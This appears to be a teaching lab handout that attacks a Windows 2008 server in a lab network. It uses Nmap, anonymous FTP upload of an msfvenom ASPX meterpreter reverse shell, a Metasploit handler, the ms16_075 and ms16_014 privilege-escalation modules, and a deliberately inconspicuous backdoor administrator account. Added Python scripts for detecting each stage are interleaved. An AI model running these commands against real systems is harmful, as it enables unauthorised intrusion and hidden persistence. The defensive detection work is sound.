1. Perform a port scan against the Windows 2008 server

In this part, you use Nmap with the -sV option. This option detects the version of the service running behind each open port. The scan takes a bit longer than the same command without this parameter. You can compare the durations and the outputs of the two commands below.

Commands:
nmap 192.168.2.11 -n
nmap 192.168.2.11 -n -sV

2. Check the FTP server for anonymous login

Command: nmap 192.168.2.11 -n --script ftp-anon -p 21
Notes: You performed this in Lab-5, Section-6, against another server (Metasploitable).

3. Check the configurations of the FTP and HTTP services

Open the Firefox browser and check the web page served by Windows 2008 by entering the server's IP address in the browser.
Connect to the FTP server as the Anonymous user. Once logged in, list the files with the dir command. (The Nmap script in Step-2 showed the same files and folders.)
Did you notice that the Web and FTP services use the same home folder?
Think about this scenario: what if you can upload a shell file using the FTP service and then call that file from the Web application?

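From the defender's side, the shared home folder you just found is visible in the server's own configuration before anyone uploads anything. The script below is an added example (not part of the lab material and not an IIS tool): it parses a constructed sample of the <sites> section of IIS 7.5's applicationHost.config and reports every physical path that is exposed through both an ftp binding and an http/https binding, whether by one site carrying both bindings or by two sites pointing at the same folder. The site names and paths in the sample are assumptions.

```python
"""Audit an IIS applicationHost.config for a web site and an FTP site that share
the same physical root. Added example for this handout, not lab material; the
XML below is a constructed sample in the shape of the <sites> section of IIS
7.5's applicationHost.config, not a file taken from the lab server."""
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample: site 1 serves both http and ftp from one folder, site 2
# serves only http from its own folder.
SAMPLE_CONFIG = """<configuration>
  <system.applicationHost>
    <sites>
      <site name="Default Web Site" id="1">
        <application path="/">
          <virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" />
        </application>
        <bindings>
          <binding protocol="http" bindingInformation="*:80:" />
          <binding protocol="ftp" bindingInformation="*:21:" />
        </bindings>
      </site>
      <site name="Intranet" id="2">
        <application path="/">
          <virtualDirectory path="/" physicalPath="C:\\inetpub\\intranet" />
        </application>
        <bindings>
          <binding protocol="http" bindingInformation="*:8080:" />
        </bindings>
      </site>
    </sites>
  </system.applicationHost>
</configuration>
"""


def normalize(path):
    """Windows paths are case-insensitive; unify slashes and case for comparison."""
    return path.replace("/", "\\").rstrip("\\").lower()


def roots_by_protocol(config_xml):
    """Map every physical path in the config to the (site, protocol) pairs that
    expose it. One site bound to both http and ftp, or two sites pointing at
    the same folder, both end up with ftp and http under the same key."""
    root = ET.fromstring(config_xml)
    exposure = defaultdict(set)
    for site in root.iter("site"):
        name = site.get("name", "")
        protocols = {b.get("protocol", "").lower() for b in site.iter("binding")}
        for vdir in site.iter("virtualDirectory"):
            key = normalize(vdir.get("physicalPath", ""))
            for proto in protocols:
                exposure[key].add((name, proto))
    return exposure


def shared_roots(config_xml):
    """Physical paths reachable over FTP and served over HTTP(S), sorted."""
    findings = []
    for path, pairs in roots_by_protocol(config_xml).items():
        protocols = {proto for _, proto in pairs}
        if "ftp" in protocols and protocols & {"http", "https"}:
            findings.append(path)
    return sorted(findings)


if __name__ == "__main__":
    for path in shared_roots(SAMPLE_CONFIG):
        print("FTP and HTTP share the root folder:", path)
```

On a real server the same functions can be pointed at %windir%\System32\inetsrv\config\applicationHost.config; a hit means that whatever the FTP authorization rules allow to be written (for anonymous users, in this lab) is also served by the web site, which is exactly the condition the next steps build on.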
4. Create an ASPX reverse shell on Kali Linux

You will use msfvenom to create an ASPX reverse shell. Server operating systems usually run on a 64-bit architecture, so you will build a 64-bit payload for the exploitation.

Command: msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.10 lport=443 -f aspx > reverseshell.aspx
Notes: reverseshell.aspx will be created.

5. Upload the ASPX file to the Windows 2008 server

Upload the file to the Windows 2008 server by using the FTP service.

6. Prepare a handler on Kali Linux

An ASPX reverse shell on its own does not let you connect to the remote server (Windows 2008). There must be a corresponding handler that responds to the ASPX reverse shell's connection request and sends commands to it. A handler can be regarded as a command and control server. The reverse shell is like an RC car, but it is only the car; the handler is the remote-control unit. Neither works alone. In this analogy, the RC unit's frequency must match the frequency of the receiver in the car. Similarly, the parameters of the handler you are creating must match the parameters of the ASPX shell.

Command: msfconsole
Notes: This command opens the Metasploit Framework.

Command: use exploit/multi/handler
Notes: Use multi/handler, which is a stub that handles exploits launched outside of the framework (in this case, the reverseshell.aspx file).

Command: setg payload windows/x64/meterpreter/reverse_tcp
Notes: Use the reverse_tcp payload for this handler. Note that you used the set command in Project-1; in this project you use setg. setg sets options globally: this option and the following ones can be used by any module loaded later on.

Command: setg lhost 192.168.2.10
Notes: Set the global local host to 192.168.2.10.

Command: setg lport 443
Notes: Set the global local port to 443.

Command: exploit or run
Notes: Both commands do the same thing and run the multi/handler.

7. Call the ASPX reverse shell by using the Firefox browser (the ASPX will run on the web application and communicate with the handler on Kali Linux). Check that the ASPX reverse shell connects to the handler and that you get a shell from Windows 2008

Action: Call the reverse shell file you uploaded by using the Firefox browser on Kali Linux
Notes: You did a similar thing in Project-1.

Action: Check that the “meterpreter session opened” message appeared in the handler window after you called the reverse shell
Notes: -

Command: shell
Notes: Type this to get the shell from Windows 2008. After typing "shell", you will see the command prompt of the Windows 2008 server.

Command: whoami
Notes: It should be “iis apppool\asp.net v4.0 user”. This is not a regular user account; instead, it is a service account associated with the web service. Take a screenshot of the user account. Let’s try some actions that require privileged access.

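Steps 5 and 7 leave two traces on the server: the FTP log records the STOR of the .aspx file by the anonymous user, and the web log records the HTTP request that executed it. The script below is an added example (not part of the lab handout): it parses constructed log lines in the W3C format that IIS writes for its FTP and web sites, and reports script files that were uploaded over FTP and later requested over HTTP. The field lists, timestamps, paths and IP addresses in the samples are constructed for the example.

```python
"""Correlate IIS FTP and web logs (W3C format) to flag a script file that was
uploaded over FTP and then requested over HTTP. Added example for this handout,
not lab material; both logs below are constructed samples in the shape IIS
writes, not captures from the lab server."""

# Extensions the web server would execute rather than serve as static content.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Constructed sample FTP log: an anonymous session stores an .aspx file.
FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-03-01 10:15:02 192.168.2.10 - ControlChannelOpened - 0
2020-03-01 10:15:02 192.168.2.10 - USER anonymous 331
2020-03-01 10:15:03 192.168.2.10 anonymous PASS *** 230
2020-03-01 10:15:10 192.168.2.10 anonymous STOR /reverseshell.aspx 226
2020-03-01 10:15:20 192.168.2.10 anonymous STOR /readme.txt 226
"""

# Constructed sample web log: the uploaded file is requested a minute later.
WEB_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2020-03-01 10:16:01 192.168.2.10 GET /ReverseShell.aspx 200
2020-03-01 10:16:05 10.0.0.5 GET /index.html 200
"""


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in #Fields.
    Directive lines (#Software, #Date, ...) are skipped; a later #Fields line
    re-defines the layout, as it does when IIS restarts a log file."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()
            if fields and len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def ftp_script_uploads(ftp_text):
    """Return (time, client ip, username, path) for every completed upload
    (STOR or APPE with a 2xx status) whose name has a script extension."""
    hits = []
    for r in parse_w3c(ftp_text):
        if r["cs-method"].upper() not in ("STOR", "APPE"):
            continue
        if not r["sc-status"].startswith("2"):
            continue
        if r["cs-uri-stem"].lower().endswith(SCRIPT_EXTENSIONS):
            hits.append((f"{r['date']} {r['time']}", r["c-ip"],
                         r["cs-username"], r["cs-uri-stem"]))
    return hits


def executed_uploads(ftp_text, web_text):
    """Uploads from the FTP log that were afterwards requested over HTTP.
    Paths are matched case-insensitively because IIS serves them that way."""
    uploads = {u[3].lower(): u for u in ftp_script_uploads(ftp_text)}
    findings = []
    for r in parse_w3c(web_text):
        hit = uploads.get(r["cs-uri-stem"].lower())
        if hit is None:
            continue
        uploaded_at, upload_from, uploaded_by, path = hit
        findings.append({
            "path": path,
            "uploaded_by": uploaded_by,
            "upload_from": upload_from,
            "uploaded_at": uploaded_at,
            "requested_at": f"{r['date']} {r['time']}",
            "requested_from": r["c-ip"],
            "http_status": r["sc-status"],
        })
    return findings


if __name__ == "__main__":
    for f in executed_uploads(FTP_LOG, WEB_LOG):
        print(f"{f['path']} uploaded by {f['uploaded_by']} from {f['upload_from']} "
              f"at {f['uploaded_at']}, executed from {f['requested_from']} "
              f"at {f['requested_at']} (HTTP {f['http_status']})")
```

The upload alone is already worth an alert when the user is anonymous; the HTTP request for the same path is what turns a suspicious file into a confirmed execution, and the two client addresses tell you whether the uploader and the caller are the same host.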
8. Confirm that the shell is a low-privileged shell

Command: net user ms_service mypass123 /add
Notes: Try to add a user named ms_service (login name).

Command: cd ..
Notes: Go to the system32 directory.

Command: cd config
Notes: Try to enter the config directory, where critical files are stored.

Command: dir
Notes: See the files in the system32 folder.

Command: del wmi.dll
Notes: Try to delete a file under system32.

This is an unprivileged shell. It is something like a “read-only” shell.

Command: exit
Notes: Exit from the command prompt of Windows 2008.
Important note: This may kill the low-privilege shell on Metasploit, resulting in this message:
“192.168.2.11 – Meterpreter session # closed. Reason: Died”
In this case, you will see the msf5 exploit(multi/handler) > prompt instead of the meterpreter > prompt. If this is the case, proceed with the following two steps. If this is NOT the case, go directly to Step-9.

Command: exploit or run
Notes: Run the multi/handler again.

Action: Call the reverse shell (reverseshell.aspx) you uploaded by using the Firefox browser
Notes: So that you can reopen the shell.

9. Try to escalate privilege

Command: background
Notes: Send the existing shell to the background. Important: make a note of the shell’s session ID.

Command: search suggester
Notes: This is an informational search command. Search for the privilege escalation module in Metasploit.

Command: use post/multi/recon/local_exploit_suggester
Notes: You will use this local exploit suggester.

Command: show options
Notes: See the options of the suggester module. It takes the session ID as a parameter.

Command: set session #
Notes: Replace the # symbol with the session ID number of the shell you sent to the background at the beginning of Step-9.

Command: exploit or run
Notes: Run the local_exploit_suggester module to find local exploits. This command takes a little time to show the results (about 10 secs). During this time, the local_exploit_suggester module uses the shell you sent to the background and tries to find exploitable local vulnerabilities. The low privilege level of the shell is sufficient for finding them.

Command: use exploit/windows/local/ms16_075_reflection
Notes: You are lucky: the suggester module suggests many exploits. You will try them until you get a high-privileged shell. Select the ms16_075_reflection exploit first to try privilege escalation.

Command: show options
Notes: After this command, you will see the global options you set in Step-6 (ms16_075 uses the values set for lhost and lport during exploitation).

Command: set session 1
Notes: This is the session you sent to the background.

Command: run
Notes: Run the selected exploit. Metasploit tries to exploit Windows 2008 to gain a high-privileged shell remotely, using the privileges of the “iis apppool\asp.net v4.0 user” user. You should get the message below:
Meterpreter session # opened
192.168.2.10:443 -> 192.168.2.11:some_port
Congrats! You get a shell!
Note that session # will be one more than the session number you sent to the background.

Command: shell
Notes: Get the shell from Windows 2008. You will see the command prompt of the Windows 2008 server.

Command: whoami
Notes: Sigh. This is still an unprivileged shell!

Command: exit
Notes: Exit from the command prompt of Windows 2008.

10. Escalate privilege

Command: background
Notes: Notice that now the session created by the ms16_075_reflection exploit is in the background. There are two unprivileged sessions in the background.

Command: use exploit/windows/local/ms16_014_wmi_recv_notif
Notes: Select another exploit module to try the privilege escalation. (If you scroll up in the terminal window, you will see that this is one of the exploits in the local_exploit_suggester output.)

Command: show options
Notes: Just check the lhost and lport parameters.

Command: set session #
Notes: Which session number should be here? The session number of the session you sent to the background earlier or later? The answer is Earlier, because you are using the exploits suggested for the earlier session by the local_exploit_suggester.

Command: run
Notes: Run the selected exploit. Metasploit tries to exploit Windows 2008 to gain a high-privileged shell remotely, using the privileges of the “iis apppool\asp.net v4.0 user” user. You should get the message below:
Meterpreter session # opened
192.168.2.10:443 -> 192.168.2.11:some_port
You get a shell once again!
Note that you will see a new session number here.

Command: shell
Notes: Get the command prompt of Windows 2008 in the Metasploit window.

Command: whoami
Notes: Congrats! You have the highest possible privilege that one can have in a Windows operating system. Take a screenshot of the terminal window.

11. Create an Administrator account on Windows 2008

Command: net user ms_service mypass123 /add
Notes: Now you will do things to maintain access (persistence). Even if the system admin patches the computer, you will have an administrator account. You will create a user named ms_service. This name is selected on purpose so as not to attract attention.

Command: net localgroup administrators ms_service /add
Notes: Add this user to the Administrators group.

Action: Switch to Windows 2008
Notes: Switch to Windows 2008 on Netlab.

Action: Log in with administrator / aA12345
Notes: -

Action: Click on the Start icon > Administrative Tools > Computer Management > Local Users and Groups > Users
Notes: You will see the ms_service account here.

Action: Click on the Start icon > Logoff
Notes: See ms_service on the login screen. Take a screenshot of the Windows 2008 logon screen. You can log in to the ms_service account if you want.

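The two commands in Step-11 are exactly the pair an administrator should be alerting on: the Security log records event 4720 when the account is created and event 4732 when it is added to the local Administrators group, and a gap of seconds between the two, made from a non-interactive context, is the signature of the persistence step above rather than of routine user administration. The script below is an added example (not part of the lab handout): it joins constructed 4720 and 4732 records on the account SID and reports accounts that became local administrators within a short window of their creation. The host name WIN2008$ and all SIDs are constructed placeholders; the only real constant is the well-known SID of BUILTIN\Administrators.

```python
"""Correlate Windows Security events 4720 (user account created) and 4732
(member added to a security-enabled local group) to flag accounts that became
local administrators within minutes of being created. Added example for this
handout, not lab material; the records below are constructed samples in the
shape of Security log event data, with a hypothetical host name WIN2008$ and
constructed account SIDs."""
import datetime as dt

# Well-known SID of the local Administrators group (BUILTIN\Administrators).
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"

# Constructed sample events. Times are ISO-8601, UTC. When a command runs as
# SYSTEM the subject is the machine account (HOSTNAME$), as in the first pair.
EVENTS = [
    {"EventID": 4720, "TimeCreated": "2020-03-01T10:40:11",
     "SubjectUserName": "WIN2008$", "TargetUserName": "ms_service",
     "TargetSid": "S-1-5-21-1111-2222-3333-1005"},
    {"EventID": 4732, "TimeCreated": "2020-03-01T10:40:30",
     "SubjectUserName": "WIN2008$", "TargetUserName": "Administrators",
     "TargetSid": BUILTIN_ADMINISTRATORS,
     "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
    # Routine case: an administrator creates an account and promotes it a day later.
    {"EventID": 4720, "TimeCreated": "2020-03-01T09:00:00",
     "SubjectUserName": "administrator", "TargetUserName": "helpdesk",
     "TargetSid": "S-1-5-21-1111-2222-3333-1004"},
    {"EventID": 4732, "TimeCreated": "2020-03-02T09:00:00",
     "SubjectUserName": "administrator", "TargetUserName": "Administrators",
     "TargetSid": BUILTIN_ADMINISTRATORS,
     "MemberSid": "S-1-5-21-1111-2222-3333-1004"},
]


def fast_admin_creations(events, window=dt.timedelta(minutes=10)):
    """Return one finding per account added to BUILTIN\\Administrators within
    `window` of its creation. The join is on the account SID, so renaming the
    account between the two events does not break the match."""
    created = {}   # SID -> (account name, creation time, creating subject)
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = dt.datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (ev["TargetUserName"], ts, ev["SubjectUserName"])
        elif ev["EventID"] == 4732 and ev["TargetSid"] == BUILTIN_ADMINISTRATORS:
            hit = created.get(ev["MemberSid"])
            if hit is None or ts - hit[1] > window:
                continue
            name, created_at, creator = hit
            findings.append({
                "account": name,
                "created_by": creator,
                "seconds_to_admin": int((ts - created_at).total_seconds()),
                # A machine account (NAME$) as the subject means the change came
                # from a service or SYSTEM context, not an interactive administrator.
                "by_machine_account": creator.endswith("$"),
            })
    return findings


if __name__ == "__main__":
    for f in fast_admin_creations(EVENTS):
        print(f"{f['account']} created by {f['created_by']} and made local admin "
              f"after {f['seconds_to_admin']} s (machine account: {f['by_machine_account']})")
```

The window is a tuning knob: ten minutes catches scripted persistence without flagging an administrator who creates an account and promotes it the next day, and the by_machine_account field separates changes made from a SYSTEM or service context (the situation after Step-10) from those made in an interactive session.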